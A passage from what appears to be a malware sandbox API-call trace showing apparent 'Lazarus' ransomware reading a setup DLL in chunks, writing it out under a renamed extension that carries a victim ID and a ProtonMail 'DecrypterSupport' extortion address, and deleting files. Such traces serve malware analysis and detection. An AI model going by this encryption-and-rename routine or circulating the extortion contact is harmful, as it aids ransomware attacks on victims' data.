cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 45 [0073.151] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0073.152] GetFileType (hFile=0x410) returned 0x1 [0073.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0073.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0073.152] GetLastError () returned 0xb7 [0073.153] SetLastError (dwErrCode=0xb7) [0073.153] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0073.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0073.153] CloseHandle (hObject=0x410) returned 1 [0073.154] AreFileApisANSI () returned 1 [0073.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0073.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x717c0 [0073.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 45 [0073.154] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml")) returned 1 [0073.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0073.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0073.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0073.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0073.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0073.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0073.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0073.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0073.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0073.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0073.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0073.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bbf8 | out: hHeap=0x20000) returned 1 [0073.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0073.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0073.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0073.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0073.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0073.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.155] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0073.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0073.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0073.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0073.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0073.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0073.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0073.156] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0073.156] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0073.156] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0073.156] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0073.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0073.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0073.156] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0073.156] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0073.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0073.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0073.156] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0073.156] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0073.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0073.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0073.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0073.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0073.156] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0073.156] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0073.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0073.156] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0073.156] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.156] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.156] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.156] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.156] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0073.156] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0073.156] AreFileApisANSI () returned 1 [0073.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\3082\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\3082\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0073.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0073.156] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.156] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0073.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0073.157] AreFileApisANSI () returned 1 [0073.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0073.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71758 [0073.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 46 [0073.157] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0073.157] GetFileType (hFile=0x410) returned 0x1 [0073.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0073.157] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0073.157] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0073.158] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0073.158] CloseHandle (hObject=0x410) returned 1 [0073.158] AreFileApisANSI () returned 1 [0073.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0073.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x716f0 [0073.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x716f0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 46 [0073.158] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0073.158] GetFileType (hFile=0x410) returned 0x1 [0073.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0073.158] CloseHandle (hObject=0x410) returned 1 [0073.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0073.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0073.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0073.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0073.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0073.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0073.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0073.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0073.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0073.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0073.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0073.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0073.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0073.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0073.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0073.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0073.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0073.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0073.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0073.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0073.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0073.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0073.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0073.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0073.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0073.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0073.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0073.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0073.159] AreFileApisANSI () returned 1 [0073.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0073.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0073.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 46 [0073.159] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958)) returned 1 [0073.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0073.159] AreFileApisANSI () returned 1 [0073.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0073.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0073.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0073.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0073.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0073.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0073.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0073.160] GetLastError () returned 0x0 [0073.160] SetLastError (dwErrCode=0x0) [0073.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dee0 [0073.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0073.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b798 [0073.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0073.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0073.160] GetLastError () returned 0x0 [0073.160] SetLastError (dwErrCode=0x0) [0073.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0073.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0073.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71bd0 [0073.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0073.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8abb8 [0073.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0073.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0073.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0073.160] AreFileApisANSI () returned 1 [0073.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8abb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0073.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x51398 [0073.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8abb8, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0073.161] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0073.161] GetFileType (hFile=0x410) returned 0x1 [0073.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0073.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0073.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0073.161] AreFileApisANSI () returned 1 [0073.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0073.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0073.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 46 [0073.161] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0073.161] GetFileType (hFile=0x418) returned 0x1 [0073.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0073.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0073.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0073.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0073.162] GetLastError () returned 0x0 [0073.162] SetLastError (dwErrCode=0x0) [0073.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0073.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0073.162] GetLastError () returned 0x0 [0073.162] SetLastError (dwErrCode=0x0) [0073.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0073.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0073.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0073.162] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0073.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0073.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0073.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e440 [0073.164] GetLastError () returned 0x0 [0073.164] SetLastError (dwErrCode=0x0) [0073.164] GetLastError () returned 0x0 [0073.164] SetLastError (dwErrCode=0x0) [0073.164] GetLastError () returned 0x0 [0073.165] SetLastError (dwErrCode=0x0) [0073.165] GetLastError () returned 0x0 [0073.165] SetLastError (dwErrCode=0x0) [0073.165] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.165] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.166] GetLastError () returned 0x0 [0073.166] SetLastError (dwErrCode=0x0) [0073.166] GetLastError () returned 0x0 [0073.166] SetLastError (dwErrCode=0x0) [0073.166] GetLastError () returned 0x0 [0073.166] SetLastError (dwErrCode=0x0) [0073.166] GetLastError () returned 0x0 [0073.167] SetLastError (dwErrCode=0x0) [0073.167] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.167] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.167] GetLastError () returned 0x0 [0073.167] SetLastError (dwErrCode=0x0) [0073.167] GetLastError () returned 0x0 [0073.167] SetLastError (dwErrCode=0x0) [0073.167] GetLastError () returned 0x0 [0073.167] SetLastError (dwErrCode=0x0) [0073.167] GetLastError () returned 0x0 [0073.167] SetLastError (dwErrCode=0x0) [0073.168] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.168] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.168] GetLastError () returned 0x0 [0073.168] SetLastError (dwErrCode=0x0) [0073.168] GetLastError () returned 0x0 [0073.168] SetLastError (dwErrCode=0x0) [0073.168] GetLastError () returned 0x0 [0073.168] SetLastError (dwErrCode=0x0) [0073.168] GetLastError () returned 0x0 [0073.168] SetLastError (dwErrCode=0x0) [0073.168] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x958, lpOverlapped=0x0) returned 1 [0073.169] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.169] GetLastError () returned 0x0 [0073.169] SetLastError (dwErrCode=0x0) [0073.169] GetLastError () returned 0x0 [0073.169] SetLastError (dwErrCode=0x0) [0073.169] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, 